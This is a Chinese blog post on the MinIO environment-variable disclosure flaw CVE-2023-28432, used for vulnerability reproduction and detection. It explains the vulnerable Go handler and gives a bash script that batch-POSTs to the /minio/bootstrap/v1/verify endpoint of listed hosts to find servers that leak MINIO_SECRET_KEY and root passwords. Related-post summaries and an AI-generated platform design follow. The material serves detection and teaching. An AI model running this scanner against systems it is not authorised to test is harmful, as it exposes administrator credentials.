MinIO信息泄露漏洞(CVE-2023-28432)批量检测POC

已于 2023-03-28 22:05:57 修改
阅读量1.3w 收藏 6
点赞数 5
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: MInIO bash 网络安全
于 2023-03-28 18:27:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_53009585/article/details/129819555
文章讲述了MinIO,一个开源对象存储服务,存在一个安全漏洞,允许未授权的攻击者通过发送恶意HTTP请求获取环境变量中的敏感信息,包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,可能导致管理员权限的滥用。影响范围主要针对特定版本的MinIO。文章提供了相关漏洞代码、POC示例以及参考资料,帮助理解和检测此问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录


吸取上次复现漏洞的教训……

概述

MinIO 是一种开源对象存储服务,与 Amazon S3 API 兼容,可用于私有云或公共云。MinIO是一种高性能、高可用的分布式存储系统,可以存储大量数据,并提供高速的数据读写能力。MinIO采用分布式架构,可以在多个节点上运行,实现数据的分布式存储和处理。
在集群部署的Minio中,未授权的攻击者可发送恶意的HTTP请求来获取Minio环境变量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录Minio。

影响范围

漏洞利用的前提是使用分布式部署
RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z

相关漏洞代码

// minio/cmd/bootstrap-peer-server.go
func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {
  ctx := newContext(r, w, "VerifyHandler")
  cfg := getServerSystemCfg()
  logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))
}
 
// minio/cmd/bootstrap-peer-server.go
func getServerSystemCfg() ServerSystemConfig {
  envs := env.List("MINIO_")
  envValues := make(map[string]string, len(envs))
  for _, envK := range envs {
    // skip certain environment variables as part
    // of the whitelist and could be configured
    // differently on each nodes, update skipEnvs()
    // map if there are such environment values
    if _, ok := skipEnvs[envK]; ok {
      continue
    }
    envValues[envK] = env.Get(envK, "")
  }
  return ServerSystemConfig{
    MinioEndpoints: globalEndpoints,
    MinioEnv:       envValues,
  }
}

VerifyHandler 函数中调用了 getServerSystemCfg() 函数,该函数返回了 ServerSystemConfig 结构体,其中包含了环境变量 MINIO_ 的键值对。由于环境变量是全局可见的,因此会将账号打印出来 。为什么环境变量中会包含账号密码信息呢?因为根据官方的启动说明,在MinIO在启动时会从环境变量中读取用户预设的管理员账号和密码,如果省略则默认账号密码为minioadmin/minioadmin。

POC

批量检测POC,bash脚本,注意赋权

#!/bin/bash
# Author : whgojp
# Enable colors
GREEN='\033[0;32m'
NC='\033[0m'

count=0

while read -r line; do
  ((count++))

  response=$(curl -s -XPOST "$line/minio/bootstrap/v1/verify -k" --connect-timeout 3)	#修改一下 这里加了-k 忽略对 SSL 证书验证
  if echo "$response" | grep -q "MinioEnv"; then		#匹配关键词
    printf "${GREEN}[!] ${line}${NC}:is Vulnerable!!!\n"
    echo "$line" >> result.txt
  else
    printf "[+] (${count}/$(wc -l < MinIO.txt)) Scanning: ${line}\n"
  fi
done < MinIO.txt

在这里插入图片描述
当然还有其他版本批量检测POC
CVE-2023-28432 nuclei templates
https://github.com/MzzdToT/CVE-2023-28432/blob/main/minio.py

检测效果;
在这里插入图片描述
手动检测:
在这里插入图片描述在这里插入图片描述
Burp手动测试的时候记得改POST发包

使用Goby红队版可以直接检测该漏洞

参考

https://aq.mk/index.php/archives/142.html
https://www.gksec.com/MinIO_RCE.html
https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q

CVE-2023-28432 MinIO 信息泄露漏洞--漏洞复现10
nnn2188185的博客
04-08 7735
MinIO是美国MinIO公司的一款开源的对象存储服务器, 是一款高性能、分布式的对象存储系统. 它是一款软件产品, 可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIOMinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息。泄露的信息中包含登录账号密码。 CVE-2023-28432 CNNVD-202303-1795
vulhub之MinIO信息泄露漏洞(CVE-2023-28432)
薛定谔嘚喵博客
08-30 2165
MinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),能看到对应权限的存储文件。
MinIO集群模式信息泄露漏洞CVE-2023-28432
2201_75756681的博客
12-27 3567
MinIO是一个用的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。
MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)
qq_35476650的博客
03-24 8300
MinIO 是一种开源的对象存储服务,它兼容 Amazon S3 API,可以在私有云或公有云中使用。MinIO 是一种高性能、高可用性的分布式存储系统,它可以存储大量数据,并提供对数据的高速读写能力。MinIO 采用分布式架构,可以在多个节点上运行,从而实现数据的分布式存储和处理。MinIO verify接口存在敏感信息泄漏漏洞,攻击者通过构造特殊URL地址,读取系统敏感信息。
HVV前最后一波—2025攻防演练必修高危漏洞清单_漏洞cnvd-2025-10031
最新发布
shandongjiushen的博客
07-06 1077
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
CVE-2023-25812 MinIO 存在权限控制不当漏洞POC
murphysec的博客
02-23 2271
MinIO 是根据 AGPL v3.0 发布的高性能对象存储框架。 MinIO 影响版本中由于未正确遵守 ByPassGoverance 的拒绝策略,当 S3 存储桶策略配置 Deny statement 为 s3:BypassGovernanceRetention 且 Allow statement 为 s3:* 时, 攻击者可发送包含 X-Amz-Bypass-Governance-Retention: true 标头的恶意请求绕过 MinIO 的治理模式(Governance mode),进而删除
Vulhub靶机 MinIO信息泄露漏洞CVE-2023-28432)(渗透测试详解)
2301_78721909的博客
02-13 1737
Vulhub靶机 MinIO信息泄露漏洞CVE-2023-28432)(渗透测试详解)
漏洞复现】MinIO敏感信息泄露CVE-2023-28432
刘家华(游戏开发)
04-23 2425
MinIO发现了信息泄露漏洞
CVE-2023-28432 MiniO信息泄露漏洞复现
Love&Share
04-28 9189
MiniO 是一个基于 Apache License v2.0 开源协议的对象存储服务。它兼容亚马逊 S3 云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等在集群部署的 Minio 中,未授权的攻击者可发送恶意的 HTTP 请求来获取 Minio 环境变量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录 Minio,分布式部署的所有用户都会受到影响,单机用户没有影响。
MinIO 环境变量泄漏漏洞CVE-2023-28432
murphysec的博客
04-04 2770
MinIO 是一个开源的对象存储服务器。 MinIO RELEASE.2023-03-20T20-16-18Z之前版本中的 bootstrap-peer-server.go#VerifyHandler 方法存在敏感信息泄漏漏洞,攻击者可向集群部署中的 MinIO 服务器的 /minio/bootstrap/v1/verify API发送POST请求,从而获取到 MINIO_SECRET_KEY 和 MINIO_ROOT_PASSWORD 等所有环境变量信息,从而以管理员身份登录 MinIO 服务。
MinIO集群模式信息泄露漏洞CVE-2023-28432)vulhub漏洞复现
qq_53003652的博客
07-10 3019
利用泄露的MINIO_ROOT_USER 和MINIO_ROOT_PASSWORD 值登录系统。可以查看Web管理页面,访问。启动burpsuite抓包。漏洞存在于API节点。
CVE-2021-21287:MiniO未授权SSRF漏洞
就是法老
08-24 7322
一:介绍 MinIO 是一个基于Apache License v2.0开源协议的对象存储服务。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等,而一个对象文件可以是任意大小,从几kb到最大5T不等。 MinIO是一个非常轻量的服务,可以很简单的和其他应用的结合,类似 NodeJS, Redis 或者 MySQL。 二:漏洞详情 由于MinIO组件中LoginSTS接口设计不当,导致存在服务器端请求伪造漏洞 攻击者可以通
MinIO漏洞 CVE-2023-28432
qq_38613494的博客
01-16 1452
MinIO集群模式中存在一个信息泄露漏洞。攻击者可以利用该漏洞获取存储在MinIO中的敏感数据。等待文件迁移完毕后,可以关闭两个minio,将旧版minio的start.sh替换成新版的启动脚本,保持原本的端口。新版本的minio,根据情况设置bucket的作用范围为:public。
MinIO未授权SSRF漏洞(CVE-2021-21287)
热门推荐
thelostworld
02-05 1万+
MinIO未授权SSRF漏洞(CVE-2021-21287) 一、漏洞简介 ​ 由于MinIO组件中LoginSTS接口设计不当,导致存在服务器端请求伪造漏洞 攻击者可以通过构造URL来发起服务器端请求伪造攻击成功利用此漏洞的攻击者能够通过利用服务器上的功能来读取、更新内部资源或执行任意命令 该漏洞无需用户验证即可远程利用 二、影响版本 MinIO < RELEASE.2021-01-30T00-20-58Z 三、环境准备&漏洞复现 Docker 安装minio: d...
黑客利用 MinIO 存储系统漏洞危害服务器
w3cschools的博客
09-06 1319
国际知名白帽黑客、东方联盟创始人郭盛华表示,此次入侵利用了公开可用的漏洞利用链对 MinIO 实例进行后门处理,其中包括CVE-2023-28432(CVSS 分数:7.5)和CVE-2023-28434(CVSS 分数:8.8),前者已添加到美国网络安全和基础设施安全局 (CISA) 的已知利用漏洞 (KEV) 目录中2023 年 4 月 21 日。值得注意的是,该二进制文件的修改版本是2023 年 4 月上旬在 GitHub 上发布的名为Evil MinIO漏洞的复制品。
复现MinIO未授权SSRF漏洞(CVE-2021-21287)
记录并分享学习安全的知识点..
02-24 5199
前言: 最近做项目测试,整理资产偶然看到基于MinIO服务器开发的网站,便想起前端时间复现过一个ssrf关于它的,测试一下竟发现该网站存在这个漏洞,窃喜万分,现将复现过程记录一下! 一、漏洞简介 MinIO是一个非常轻量的服务,可以很简单的和其他应用的结合,类似 NodeJS, Redis 或MySQL,是基于Apache License v2.0开源协议的对象存储服务。由于MinIO组件中LoginSTS接口设计不当,导致存在服务器端请求伪造漏洞。攻击者可以通过构造URL来发起服务器端请求伪造攻击成
我在做毕业设计,我想把不同的中间件漏洞集合到一个平台上展示,请问这个集合应该怎么做?
03-11
<think>嗯,用户在做毕业设计,想把不同的中间件漏洞集合到一个平台上展示。首先,我需要理解他的需求。中间件漏洞有很多种,比如Apache、Nginx、Tomcat、Redis之类的常见中间件。他可能需要一个平台来集中展示这些漏洞的信息、复现方法、修复建议等。 用户可能不太清楚如何组织这些内容,或者技术实现上有什么需要注意的地方。首先,应该考虑平台的结构设计。可能需要分模块,比如漏洞库、实验环境、演示系统、知识库这些部分。这样用户访问时可以清晰找到所需信息。 接下来是技术选型。前端部分,Vue或React都是不错的选择,考虑到用户可能对前端框架的熟悉程度。后端的话,Spring Boot或者Django,这样能快速搭建RESTful API。数据库方面,MySQL或MongoDB,取决于数据结构是否需要灵活性。另外,实验环境可能需要Docker来隔离漏洞环境,保证安全性。 然后,漏洞数据的收集和分类。需要确保来源可靠,比如NVD、CVE、CNVD等官方渠道。分类要细致,按中间件类型、漏洞类型、危害等级来分,这样用户查找起来方便。每个漏洞的详情页要有描述、影响版本、复现步骤、修复方案,可能还需要PoC或Exp的代码片段。 安全隔离是关键,特别是如果提供实验环境的话。必须用Docker容器化,每个漏洞环境独立,避免相互影响。网络方面也要隔离,防止外部攻击。还有用户权限控制,普通用户只能查看,实验可能需要申请权限,防止滥用。 交互设计方面,用户友好的界面很重要。搜索和过滤功能必不可少,让用户快速找到目标漏洞。可视化数据,比如用图表展示漏洞趋势,能更直观。如果有实验环境,提供一键启动和还原的功能会更方便。 测试环节也不能忽视。功能测试确保各模块正常,安全测试防止平台自身出现漏洞,性能测试保证多人访问时的稳定性。部署时可以选择云服务器,用Nginx做反向代理,HTTPS加密数据。 最后,扩展性和维护性。设计时要考虑未来添加新漏洞的便利性,定期更新漏洞库,建立用户反馈渠道。这样平台才能持续发展,满足长期需求。 可能用户没有考虑到的地方,比如安全隔离和权限控制,这些对于防止漏洞被恶意利用很重要。另外,数据来源的权威性也需要强调,确保漏洞信息的准确性。还有法律问题,收集和展示漏洞信息是否合规,可能需要提醒用户注意相关法律法规。</think>以下是为您设计中间件漏洞集合平台的逐步实施方案,分模块和技术要点说明: 一、平台架构设计(三层结构) 1. 展示层 - 使用Vue.js/React+Ant Design搭建响应式前端 - 集成Echarts可视化模块展示漏洞分布 - 实现交互式拓扑图展示中间件架构 2. 业务层 - Spring Boot/Django框架开发RESTful API - 漏洞验证引擎(Python/Go编写) - 实验环境调度系统(集成Docker API) 3. 数据层 - MySQL存储漏洞元数据 - Redis缓存高频访问数据 - Minio存储PoC脚本/漏洞环境镜像 二、核心功能实现 1. 漏洞数据库构建 - 数据采集: * 官方源:NVD、CVE、CNVD(每日自动同步) * 社区源:GitHub Advisories、Exploit-DB - 数据结构设计: ```json { "cve_id": "CVE-2023-1234", "middleware": "Apache Tomcat", "affected_versions": ["9.0.0-M1 - 9.0.43"], "vuln_type": "RCE", "cvss_score": 9.8, "poc_location": "/poc/CVE-2023-1234.py", "env_image": "tomcat-9.0.40" } ``` 2. 安全沙箱环境 - 使用Docker Compose编排环境: ```yaml version: '3' services: vulnerable_tomcat: image: vulhub/tomcat:9.0.40 ports: - "8080:8080" networks: - vuln_isolated_net restart: on-failure networks: vuln_isolated_net: driver: bridge internal: true ``` 3. 漏洞验证系统 - 开发通用验证框架: ```python class VulnerabilityTester: def __init__(self, target_url): self.target = target_url self.session = requests.Session() def test_cve_2023_1234(self): try: resp = self.session.post(f"{self.target}/api", data=malicious_payload, timeout=5) return "存在漏洞" if "executed" in resp.text else "已修复" except Exception as e: return f"检测失败: {str(e)}" ``` 三、关键安全措施 1. 实验环境隔离方案 - 使用Linux命名空间隔离: ```bash # 创建隔离网络命名空间 ip netns add vuln-ns # 限制CPU/内存使用 docker run --cpus 0.5 -m 512m --ulimit nofile=1024:1024 ``` 2. 访问控制策略 - RBAC权限模型设计: ```sql CREATE TABLE user_roles ( user_id INT PRIMARY KEY, role ENUM('guest','researcher','admin'), experiment_quota INT DEFAULT 3 ); ``` 四、扩展功能建议 1. 智能关联分析 - 使用Neo4j构建知识图谱: ```cypher MATCH (m:Middleware)-[r:HAS_VULNERABILITY]->(v:Vulnerability) WHERE v.cvss >= 9.0 RETURN m.name, count(v) as critical_vulns ORDER BY critical_vulns DESC ``` 2. 自动化更新机制 - 搭建CI/CD流水线: ```groovy pipeline { stages { stage('数据同步') { steps { sh 'python3 sync_nvd.py --daily' } } stage('镜像构建') { when { expression: return hasNewCve() } steps { buildDockerImages() } } } } ``` 实施建议: 1. 开发路线分三期: - 一期:基础平台+5个典型漏洞(3个月) - 二期:自动化检测+可视化(2个月) - 三期:智能分析+移动端适配(1个月) 2. 测试重点: - 安全隔离有效性测试 - 并发环境调度测试 - XSS/SQL注入防护测试 3. 论文支撑点: - 多源异构漏洞数据整合方法 - 基于容器化的动态防御技术 - 漏洞知识图谱构建算法 注意法律合规性: - 所有PoC需声明"仅用于教育研究" - 实验环境需设置访问者协议 - 敏感操作记录完整审计日志 该方案平衡了展示效果与技术深度,既满足毕业设计的学术要求,又具备实际应用价值。建议从Apache和Nginx的常见漏洞入手,逐步扩展到其他中间件。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值